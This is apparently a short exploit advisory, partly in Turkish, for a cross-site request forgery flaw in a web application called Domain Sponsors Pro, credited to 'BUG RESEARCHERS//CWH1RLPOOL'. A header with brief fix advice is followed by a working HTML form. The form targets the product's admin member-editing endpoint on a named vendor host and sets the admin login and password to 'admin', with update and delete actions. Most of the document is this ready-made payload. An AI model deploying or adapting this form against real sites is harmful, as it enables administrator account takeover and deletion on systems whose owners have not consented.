< ------------------- header data start ------------------- >

#############################################################

# Application Name :Domain Sponsors Pro

# vulnerable Type : xsrf

# Infection : Admin Bilgileri Degistirilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form method=POST action=http://www.blizsoft.com/domains/adminy/EditADMMembers.php name=Members>
<input type=text name=member_login maxlength=15 value=admin size=15>
<input type=text name=member_password maxlength=15 value=admin size=15>
<input type=text name=first_name maxlength=20 value= size=20>
<input type=text name=last_name maxlength=20 value= size=20>
<input type=text name=email maxlength=30 value= size=30>
<input type=text name=phone maxlength=20 value= size=20>
<input type=hidden value=update name=FormAction/>
<input type=submit value=update onclick=document.Members.FormAction.value = ’update’;/>
<input type=submit value=delete onclick=document.Members.FormAction.value = ’delete’;/>
<input type=submit value=Cancel onclick=document.Members.FormAction.value = ’cancel’;/>
<input type=hidden name=FormName value=Members/>
<input type=hidden name=PK_member_id value=1/>
<input type=hidden name=member_id value=1/>
</form>
< -- bug code end of -- >